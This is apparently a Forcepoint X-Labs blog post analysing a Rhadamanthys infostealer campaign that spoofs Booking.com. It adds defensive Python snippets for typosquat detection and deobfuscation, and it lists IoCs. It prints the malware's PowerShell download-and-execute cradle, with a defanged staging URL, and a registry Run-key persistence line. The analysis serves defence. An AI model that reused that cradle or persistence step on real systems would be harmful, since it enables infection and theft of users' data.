
Rhadamanthys Stealer Spoofs Emails to Attack Switzerland and the United Kingdom


Yesterday, Lydia blogged about the XWorm malware that targeted the hospitality sector. Alongside it, X-Labs also observed concurrent activity: the Rhadamanthys infostealer is targeting hotels, restaurants and other businesses in Switzerland and the United Kingdom.

The Rhadamanthys stealer spreads malicious attachments via emails spoofing Booking.com. During our analysis, we noticed this campaign shared similarities with the Agent Tesla activity we saw in early 2024.

In the Rhadamanthys campaign, hackers leveraged similar infrastructure but used new obfuscation techniques to steal sensitive information from users. Now, I’ll look deeper into the new techniques to better understand how this infostealer works.

Fig. 1 - Rhadamanthys attack chain

Email Analysis:

Fig. 2 - Rhadamanthys email

The emails read like suspicious AI-generated messages and contain technical anomalies: generic recipient addresses, “do not reply” keywords and more. The sender domain appears to be a typosquatted Booking.com domain, “@b00king[.]network”. The emails carry a suspicious PDF attachment posing as a fake invoice or alert message.
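The look-alike sender domains above all rely on digit-for-letter substitutions (b00king, bo0king). The following Python snippet is an added example, not Forcepoint's code or tooling: it refangs an indicator, undoes common homoglyph substitutions on every DNS label, and compares the result against a brand watchlist, so a brand hidden in a subdomain of a cloud hosting service is caught as well as a registered look-alike. The watchlist, the legitimate-domain allowlist and the sample addresses are constructed assumptions for this example.

```python
import re

# Constructed watchlist for this example: the brand label to protect and the
# domains that legitimately carry it (assumed; adjust to your own brand list).
BRAND_WATCHLIST = {"booking"}
LEGITIMATE_DOMAINS = {"booking.com"}

# Digit-for-letter substitutions commonly seen in look-alike domains.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b"})


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'b00king[.]network' back into a plain domain."""
    return indicator.lower().strip().replace("[.]", ".").replace("(.)", ".")


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, small enough to inline rather than add a dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_sender(address_or_host: str) -> dict:
    """Classify a sender address or host name as legitimate, typosquat or unrelated.

    Every DNS label is checked, so a brand hidden in a subdomain of a hosting
    service (bo0king.blob.core.windows.net) is caught as well.
    """
    domain = refang(address_or_host).split("@")[-1]
    if domain in LEGITIMATE_DOMAINS or any(domain.endswith("." + d) for d in LEGITIMATE_DOMAINS):
        return {"domain": domain, "verdict": "legitimate", "brand": None, "label": None}

    for label in domain.split("."):
        normalized = label.translate(HOMOGLYPHS)
        for brand in BRAND_WATCHLIST:
            if normalized == brand:
                # Exact brand once the digit substitutions are undone: high confidence.
                return {"domain": domain, "verdict": "typosquat", "brand": brand,
                        "label": label, "confidence": "high"}
            if levenshtein(normalized, brand) == 1:
                # One character off (dropped, added or swapped letter): worth a look.
                return {"domain": domain, "verdict": "typosquat", "brand": brand,
                        "label": label, "confidence": "medium"}
    return {"domain": domain, "verdict": "unrelated", "brand": None, "label": None}


if __name__ == "__main__":
    # Constructed samples; the defanged ones mirror the indicators listed in this post.
    for sample in ["noreply@b00king[.]network", "b00king[.]co[.]za",
                   "bo0king[.]blob[.]core.windows[.]net", "noreply@booking.com",
                   "news@example.org"]:
        print(f"{sample:40} -> {check_sender(sample)}")
```

Run it over the sender and hosting domains from the IoC list at the end of this post and each one comes back as a high-confidence match for the brand, while the genuine booking.com address is allowed through by the allowlist rather than by the similarity check. The distance-1 tier catches added or dropped letters but will also match unrelated seven-letter words, so treat it as a triage hint rather than a block decision.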


Analysis of PDF:

When the user opens the PDF, they see an alert message: “Reader not Supported! Please Open in browser.”

Fig. 3 - PDF Attachment

When the user clicks OK, they see another error message that prompts them to click a ‘Reload’ button. Clicking this button executes embedded JavaScript code that connects to a malicious URL and downloads the next-stage JavaScript payload:

Fig. 4 - JavaScript in PDF

The code embedded in the PDF connects to a typosquatted Booking.com URL hosted on free hosting infrastructure at bo0king[.]blob[.]core.windows[.]net/booking/invoice-1829388947.pdf.html.

Obfuscated JavaScript payload:

The downloaded JavaScript is obfuscated with extremely long variable and function names (507-byte names) and with built-in functions such as parseInt().

Fig. 5 - Obfuscated JavaScript code

Upon replacing the long variable and function names, we see the next-stage obfuscated payload (Fig. 6 below):

Fig. 6 - First level obfuscated JavaScript

Deobfuscation gets us to the actual PowerShell code:

  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm hxxps://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf);Start-Sleep -Seconds 3;
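The interesting trick in that command line is `('{1}{0}' -f 'ex', 'I')`: PowerShell's format operator assembles the string "Iex" at run time so that a plain keyword search for "iex" or "Invoke-Expression" never sees it. The Python snippet below is an added example written for this post, not Forcepoint's or anyone else's detection code. It resolves format-operator expressions with single-quoted literal arguments back to the string they evaluate to, then flags the download-cradle indicators that remain (execution-policy bypass, the now-visible Invoke-Expression, the `irm` download and the URL). The regexes and the sample command line (a copy of the one above with the leading quote assumed) are constructed for the example.

```python
import re

# PowerShell's format operator with single-quoted literal arguments, e.g.
# ('{1}{0}' -f 'ex', 'I'), which the command above uses to spell "Iex" without
# ever writing it. Double-quoted or computed arguments are out of scope here.
FORMAT_OP = re.compile(r"\(\s*'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)", re.IGNORECASE)
PLACEHOLDER = re.compile(r"\{(\d+)\}")

EXEC_POLICY_BYPASS = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE)
INVOKE_EXPRESSION = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.IGNORECASE)
# Accepts both live (http) and defanged (hxxp) URLs so the function works on IoC text too.
URL = re.compile(r"\bh[xt]{2}ps?://[^\s'\")\;]+", re.IGNORECASE)


def resolve_format_operator(cmdline: str) -> str:
    """Replace every ('{..}' -f 'a', 'b') expression with the string it evaluates to."""
    def expand(match):
        fmt, raw_args = match.group(1), match.group(2)
        args = re.findall(r"'([^']*)'", raw_args)

        def pick(placeholder):
            index = int(placeholder.group(1))
            # Leave an out-of-range placeholder alone instead of guessing.
            return args[index] if index < len(args) else placeholder.group(0)
        return PLACEHOLDER.sub(pick, fmt)
    return FORMAT_OP.sub(expand, cmdline)


def triage_powershell(cmdline: str) -> dict:
    """Resolve format-string obfuscation, then report the cradle indicators that remain."""
    resolved = resolve_format_operator(cmdline)
    findings = []
    if EXEC_POLICY_BYPASS.search(cmdline):
        findings.append("execution policy bypass")
    if INVOKE_EXPRESSION.search(resolved):
        if INVOKE_EXPRESSION.search(cmdline):
            findings.append("invoke-expression")
        else:
            # Only visible after resolving the -f operator: a deliberate evasion.
            findings.append("invoke-expression hidden behind -f format operator")
    if DOWNLOAD_CRADLE.search(resolved):
        findings.append("remote download cradle")
    return {"resolved": resolved, "findings": findings, "urls": URL.findall(resolved)}


# Constructed from the command line shown above; the leading quote is assumed.
SAMPLE_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm hxxps://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf);Start-Sleep -Seconds 3;'''

if __name__ == "__main__":
    report = triage_powershell(SAMPLE_CMDLINE)
    print("resolved:", report["resolved"])
    for finding in report["findings"]:
        print(" -", finding)
    print("urls:", report["urls"])
```

The resolved command reads `& Iex $(irm hxxps://...)`, and the report lists three findings plus the staging URL. Checking the original and the resolved text separately is what lets the function say not just that Invoke-Expression is present but that it was hidden, which is a stronger signal than the keyword alone.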

From here, we can see that the malware authors hosted the staged payloads on blogspot.com. That page redirects to another legitimate cloud repository, used to host a further PowerShell script that is downloaded automatically:

  • hxxps://bitbucket[.]org/!api/2.0/ snippets/nippleskakulcha/xqM7BE/64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21b/files/decfianl[.]txt

The script also contains an obfuscated self-signed certificate, seen after the JavaScript code (see Fig. 7):

Fig. 7 - Obfuscated signature below JavaScript code

Analysis of PowerShell script:

The script stores large octal-encoded shellcode in variables. It targets legitimate processes on the system such as RegSvcs.exe, mshta.exe, wscript.exe and msbuild.exe, which it can stop in order to inject the malicious code.

Fig. 8 - PowerShell script

Here we observe the octal-to-text converter function in the code. The script then deletes itself from the system and creates another payload with a random name for persistence.

Fig. 9 - Octal to text decode function in PowerShell
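An analyst looking at a script like this wants to pull the octal-encoded blobs out without running the decoder the malware ships with. The Python below is an added example written for this post (it is not the dropper's own decoder and not Forcepoint code): it finds quoted strings that decode cleanly as octal byte values, rejects strings that merely contain numbers, and summarises each blob with its length, Shannon entropy, printability and whether it starts with a PE "MZ" header. The sample script it runs over is a constructed stand-in with two small encoded strings, not the real payload.

```python
import math
import re
from collections import Counter

# Single- or double-quoted PowerShell string literals; no escape handling is
# needed for a payload made of digits and separators.
STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
OCTAL_BYTE = re.compile(r"[0-7]{1,3}")


def decode_octal_tokens(tokens) -> bytes:
    """Decode a sequence of octal byte strings ('110', '145', ...) into bytes.

    Raises ValueError for anything that is not octal or exceeds 0o377 (255), so a
    caller can tell a real encoded blob from a list of ordinary numbers.
    """
    out = bytearray()
    for token in tokens:
        if not OCTAL_BYTE.fullmatch(token):
            raise ValueError(f"not an octal byte: {token!r}")
        value = int(token, 8)
        if value > 0xFF:
            raise ValueError(f"octal value out of byte range: {token!r}")
        out.append(value)
    return bytes(out)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; packed or encrypted shellcode sits near 8, plain text well below."""
    if not data:
        return 0.0
    counts = Counter(data)
    return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())


def find_octal_blobs(script: str, min_tokens: int = 8) -> list:
    """Locate quoted strings that decode cleanly as octal bytes and summarise each one."""
    blobs = []
    for match in STRING_LITERAL.finditer(script):
        body = match.group(1) if match.group(1) is not None else match.group(2)
        tokens = [t for t in re.split(r"[\s,]+", body.strip()) if t]
        if len(tokens) < min_tokens:
            continue
        try:
            data = decode_octal_tokens(tokens)
        except ValueError:
            continue  # quoted text that merely contains numbers
        printable = all(32 <= b < 127 or b in (9, 10, 13) for b in data)
        blobs.append({
            "offset": match.start(),
            "length": len(data),
            "entropy": round(shannon_entropy(data), 2),
            "printable": printable,
            "looks_like_pe": data[:2] == b"MZ",
            "data": data,
        })
    return blobs


# Constructed stand-in for the dropper script: two octal-encoded strings, a
# decoy list of plain numbers and a decoder of the kind the post describes
# (illustrative only, not the actual malware code).
SAMPLE_SCRIPT = r'''
$target = "RegSvcs.exe"
$banner = '110 145 154 154 157 54 40 127 157 162 154 144 41'
$stub = "115 132 220 0 3 0 0 0 4 0 0 0 377 377 0 0"
$digits = '1 2 3 4 5 6 7 8 9'
function Convert-OctalToText($s) {
    ($s -split ' ' | ForEach-Object { [char][Convert]::ToInt32($_, 8) }) -join ''
}
'''

if __name__ == "__main__":
    for blob in find_octal_blobs(SAMPLE_SCRIPT):
        head = blob["data"][:16]
        preview = head.decode("ascii", "replace") if blob["printable"] else head.hex(" ")
        print(f"offset={blob['offset']} len={blob['length']} entropy={blob['entropy']} "
              f"printable={blob['printable']} pe={blob['looks_like_pe']} preview={preview}")
```

On the sample, the first blob decodes to readable text and the second to the start of a DOS header, while the decoy string `'1 2 3 4 5 6 7 8 9'` is rejected because 8 and 9 are not octal digits. Entropy is the useful triage number on a real script: a blob that decodes to bytes near 8 bits per byte is most likely a further packed or encrypted stage rather than the final shellcode.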

Analysis of final legitimate process:

Once the targeted process has been injected with the malicious code, it creates a new svchost.exe process instance that it uses for further execution. At this point it connects to the C2 server over an unusual port:

185[.]196[.]8[.]68:7257/6d5f5120d519e2005/jl1w2l3p.070xf

Once connected, it:

  • Tries to steal the user’s personal information from browser history
  • Tries to gather system information
  • Creates a scheduled task that embeds PowerShell code in the system registry for persistence:

    “Software\Microsoft\Windows\CurrentVersion\Run\Uplatbook-141 = "schtasks /run /tn Uplatbook-141"”

  • Uses an unregistered version of the .NET Reactor obfuscator
  • Explicitly abuses Chrome and Edge (edge.exe) to connect to the remote host

Conclusion:

This Rhadamanthys stealer attack relies on typosquatted domains and malicious PDFs to deliver obfuscated payloads and execute PowerShell scripts. It uses free hosting services and cloud repositories to evade detection and installs persistence mechanisms such as scheduled tasks and registry modifications.

By leveraging legitimate processes, it establishes stealthy communication with its C2 server and attempts to steal browser data along with system information. Sophisticated obfuscation techniques such as long variable names and octal encoding achieve the desired effect: making detection and analysis more complex.

Protection statement: 

Forcepoint customers are protected against this threat at the following stages of attack:

  • Stage 2 (Lure) – Malicious PDF attachments associated with these attacks are identified and blocked by email security analytics.
  • Stage 3 (Redirect) – Redirecting blogspot URLs and Bitbucket cloud project URLs are blocked by real-time web security scanning.
  • Stage 5 (Dropper File) – The dropper files are added to the Forcepoint malicious database and are blocked.
  • Stage 6 (Call Home) – Blocked C2 credentials

IOCs

Initial Stage URLs: 

  • bo0king[.]blob[.]core.windows[.]net/booking/invoice-1829388947.pdf.html
  • hxxps://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf
  • hxxps://bitbucket[.]org/!api/2.0/ snippets/nippleskakulcha/xqM7BE/64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21b/files/decfianl[.]txt

C2s:

  • 185[.]196[.]8[.]68
  • 185[.]196[.]11[.]18

Spoofed sender domains:

  • b00king[.]biz
  • b00king[.]co[.]za
  • b00king[.]network

Mayur Sewani

Mayur serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malware, information stealers, phishing attacks, and also works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research.
